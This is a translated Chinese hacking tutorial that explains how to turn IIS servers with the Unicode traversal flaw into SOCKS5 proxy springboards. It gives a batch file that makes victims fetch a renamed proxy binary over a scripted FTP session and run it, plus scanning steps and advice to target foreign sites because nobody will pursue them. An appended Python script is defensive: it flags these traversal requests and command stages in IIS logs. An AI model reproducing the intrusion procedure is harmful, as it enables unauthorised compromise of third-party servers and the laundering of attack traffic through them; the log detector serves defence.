安全卫士 (Security Guard)
snake's sksockserver (a proxy "springboard") is a very good SOCKS5 proxy server. It is tiny, only 32K, yet it supports TCP and UDP fairly completely, also supports OICQ, and it can encrypt the traffic between springboard hops. That lets us cover our tracks online quite well. Using it, however, requires some knowledge of breaking into servers, which is a real challenge for a newcomer. So I wrote this article; I hope it helps.
Required software: 流光 4 (Fluxay 4), the proxy springboard SkSockServer, and 代理猎手 (Proxy Hunter).
Preparation: get an FTP account; most free homepage hosting these days comes with FTP space. Suppose the FTP server is ftp.server.com, the user name is tom and the password is pass. Rename SkSockServer.exe to char.exe and upload it to the FTP space. The rename is only to make the file less conspicuous; pick whatever name you like.
Steps:
Step 1: in the root of drive C create a text file pp.txt with the following contents:
echo open ftp.server.com>af.txt
echo tom>>af.txt
echo pass>>af.txt
echo bin>>af.txt
echo get char.exe>>af.txt
echo bye>>af.txt
ftp -s:af.txt
del a.txt
del af.txt
char -debug 5262
Note: substitute your real FTP host name, user name and password for ftp.server.com, tom and pass above, or it will not work. Now check that the file is right: copy pp.txt and rename the copy to pp.bat. Connect to the Internet and run pp.bat; if you made no mistakes, a char.exe should appear in the directory containing pp.bat. If char.exe is not there, check that your network connection is up, and use an FTP client to confirm that char.exe really is in your FTP space. Above all, check that the FTP server name is spelled correctly and that the user name and password are right.
Let me explain what this file does. If you know DOS, the purpose of pp.txt will be obvious.
echo displays the characters you give it on screen: at a DOS prompt, echo hello prints "hello".
">" is the output redirection operator. Running the DOS command echo hello>a.txt writes hello into the file a.txt; any previous contents of a.txt are discarded and the file then holds only the word hello. If a.txt does not exist, it is created. ">>" differs from ">" in that it does not discard the file's existing contents; it appends the new text to the end of the file.
Now look at what pp.txt does when it runs. The lines
echo open ftp.server.com>af.txt
echo tom>>af.txt
echo pass>>af.txt
echo bin>>af.txt
echo get char.exe>>af.txt
echo bye>>af.txt
create a file af.txt in the current directory with this content:
open ftp.server.com
tom
pass
bin
get char.exe
bye
Then ftp -s:af.txt runs. This makes the system invoke the ftp command with af.txt as its script, log in with the user name and password, switch to binary mode (bin, so the executable is not mangled) and download char.exe.
The rest needs little explanation: the two del lines delete a.txt and af.txt, and char -debug 5262 starts the SOCKS5 service on port 5262.
Step 2: open Fluxay 4 and press Ctrl+R. In the dialog that pops up, enter the IP range you want to scan; I suggest scanning sites in Taiwan, the United States or Japan, since they have more vulnerable hosts. Set the host type to scan to IIS/FrontPage. Here I scan 210.59.70.1 - 210.59.72.254. A prompt appears when the scan finishes; it took me about 5 minutes. The results appear in the middle pane of Fluxay in four columns: host, system version, type and description. If a host is shown in black, that is, its type column reads Remote Execute X (X being a letter from A to E), the host has the Unicode vulnerability. Click it, choose Connect, untick the "允许IIS检测CMD" (allow IIS to detect CMD) option, and you can execute commands on it.
Step 3: first run one command to see whether the host lets us write files.
Enter echo hello>a.txt. Several responses are possible:
A. If writing is allowed, the output shows only [echo hello>a.txt]
Then this server can serve as our springboard.
B. If the server refuses, it shows [echo hello>a.txt] Access is denied.
This means the server does not let us write files; move on to the next one, this one is no good.
C. A trap is in use: [echo hello>a.txt] HTTP/1.1 502 Gateway Error
The host may have some countermeasure in place; try the same command again, it may go through.
D. Anything else
I do not know the cause. Try the following steps anyway; they may still work.
When you get case A, the host can be used as a springboard. Now enter
local file:c:\pp.txt
This command makes Fluxay execute the commands in c:\pp.txt one after another, saving us from typing them in one by one. Its output looks roughly like this:
[local file:c:\pp.txt]
[echo open ftp.server.com>af.txt]
[echo tom>>af.txt]
[echo pass>>af.txt]
[echo bin>>af.txt]
[echo get char.exe>>af.txt]
[echo bye>>af.txt]
[ftp -s:af.txt]
[del a.txt]
[del af.txt]
[char -debug 5262]
The output differs slightly on some machines, but it is basically like this. If any of the commands returns "HTTP/1.1 502 Gateway Error", run local file:c:\pp.txt again.
If you get Connect Failed, your network connection probably has a problem; check whether you have been disconnected, then run local file:c:\pp.txt again.
Step 4: now verify that the springboard is really running. Start Proxy Hunter, choose to add a result, and enter the IP of the host above with port 5262 (the digits sound like "I love Ling'er" in Chinese) and protocol SOCKS5. Verify it and see whether the result is Free. If it is, you are done. If not, run local file:c:\pp.txt once more; if that still fails, give up and find another machine. Close the IIS remote command line, pick another machine with the Unicode vulnerability and repeat step 3; in this way every Unicode-vulnerable host you found can become a springboard.
Step 5: run the GUI version of skserver, choose Configuration, then the "经过的skserver" (skservers to pass through) list, and add one or two of the springboards you just set up. Do not add too many, or your browsing speed will suffer; unless you have special needs, one is enough. Click OK, then in the Command menu choose Stop and then Start. You now have an encrypted SOCKS5 proxy. Use SOCKS client software such as SocksCap or the NEC e-Border client to route your network programs through it, and surf away.
Note: the privileges obtained through the Unicode vulnerability are very low, so sksockserver cannot be installed as a service and therefore cannot start automatically at boot. If it stops, it is easy to start it again: just as when you set it up, open the IIS command line and run char -debug 5262. If you have any questions, write to me and we can discuss them.
Acknowledgements: many thanks to snake for the proxy springboard; it lets me get past the school's blocking, surf freely and chat with my Ling'er. Thanks also to 小榕 (Xiaorong); his Fluxay is the most powerful yet simplest hacking tool I have ever seen. And of course I will not forget 太阳风 (Solar Wind), whose Proxy Hunter was the program that led me through the door into networking.
Supplement:
With my method you basically cannot erase the traces of the intrusion. So be careful, and never hack domestic sites. If you hack small sites in Taiwan, Japan or the United States, nobody will bother about it! Also, attacking through a springboard is quite safe, except that when you use a host as a springboard you also expose your own IP to it. Rest assured, with my method you will never hit a domestic site by accident, even if you wanted to: Fluxay does not allow scanning domestic sites.
As for whether you can write files on the server, I think I explained that clearly in the article. In step 3 I had you first enter the command echo hello>a.txt; if the server does not allow writing files, it returns Access Denied, and you have to look for another server.
The simplest way to tell whether a server can be used as a springboard:
In step 3, enter echo hello>a.txt
then enter dir a.txt
If a.txt exists, the host can be used as a springboard.
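As an added example (not part of the original article, and not code from the tools it names), here is the defender's view of the traces the supplement says cannot be erased. Every command typed through the IIS command line above is one HTTP request whose path carries an overlong UTF-8 encoding of "/" (%c0%af) or "\" (%c1%9c), which IIS 4/5 decoded only after its ../ check had run, and whose query string is the command line handed to cmd.exe. The script parses W3C-format IIS log lines, flags those overlong separators, and tags the stages of the chain described in steps 1 and 3 (echo redirect, FTP script build, ftp -s: download, a binary started with -debug on a port). The log lines, client addresses and timestamps are constructed for the example.

```python
"""Find the Unicode-traversal -> cmd.exe -> ftp -s: -> proxy chain in IIS logs.

Added example; not code from the original article or from the tools it names.
Input is W3C-format IIS log text; the sample below is constructed.
"""
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 encodings of "/" (c0 af) and "\" (c1 9c). They are invalid
# UTF-8, so they never occur in a legitimate path, but IIS 4/5 decoded them to
# the ASCII separators after the "../" check had already run.
OVERLONG_SEPARATORS = {b"\xc0\xaf": "/", b"\xc1\x9c": "\\"}

# Stages of the procedure in the article, matched against the decoded query.
STAGE_PATTERNS = [
    ("echo-redirect", re.compile(r"\becho\b[^>]*>", re.I)),             # echo x>file
    ("ftp-script",    re.compile(r"\becho\s+(open|user|bin|get|bye)\b", re.I)),
    ("ftp-download",  re.compile(r"\bftp\s+-s:", re.I)),                 # ftp -s:af.txt
    ("proxy-start",   re.compile(r"\S+\s+-debug\s+\d{1,5}\b", re.I)),    # char -debug 5262
]

# Constructed sample in the W3C extended format IIS 5 writes (spaces in the
# query are logged as "+"). Client addresses are documentation ranges.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-03-12 14:02:11 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+echo+hello>a.txt 200
2001-03-12 14:02:40 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+echo+open+ftp.server.com>af.txt 200
2001-03-12 14:03:15 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+ftp+-s:af.txt 200
2001-03-12 14:03:50 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+char+-debug+5262 200
2001-03-12 14:04:02 198.51.100.7 GET /default.htm - 200
2001-03-12 14:04:30 203.0.113.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir 200
""".splitlines()


def parse_w3c(lines):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def overlong_traversal(stem):
    """Return the separators smuggled into the path as overlong UTF-8, e.g. ['/']."""
    raw = unquote_to_bytes(stem)
    return [sep for enc, sep in OVERLONG_SEPARATORS.items() if enc in raw]


def classify(record):
    """Tag one request with the indicators it carries (empty list = nothing seen)."""
    findings = []
    stem = record.get("cs-uri-stem", "")
    if overlong_traversal(stem):
        findings.append("unicode-traversal")
    if b"cmd.exe" in unquote_to_bytes(stem).lower():
        findings.append("cmd.exe")
    # The query is the command line handed to cmd.exe; "+" stands for a space.
    cmdline = unquote_to_bytes(record.get("cs-uri-query", "")).replace(b"+", b" ")
    cmdline = cmdline.decode("latin-1")
    for name, pattern in STAGE_PATTERNS:
        if pattern.search(cmdline):
            findings.append(name)
    return findings


def scan(lines):
    """Return [(client IP, findings)] for every request that carries an indicator."""
    hits = []
    for rec in parse_w3c(lines):
        findings = classify(rec)
        if findings:
            hits.append((rec["c-ip"], findings))
    return hits


def attack_chains(lines):
    """Group indicators per client. A client that combines the traversal with
    the download or proxy-start stage has very likely planted a springboard."""
    by_ip = {}
    for ip, findings in scan(lines):
        by_ip.setdefault(ip, set()).update(findings)
    return {ip: sorted(f) for ip, f in by_ip.items()
            if "unicode-traversal" in f and f & {"ftp-download", "proxy-start"}}


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ", ".join(findings))
    print("springboard chains:", attack_chains(SAMPLE_LOG))
```

Run against a real IIS log by passing its lines to scan(); the second client in the sample (203.0.113.5) only ran dir through the traversal, so it is flagged by scan() but not reported by attack_chains(), which is the distinction a responder wants between a probe and a host that has actually been turned into a springboard.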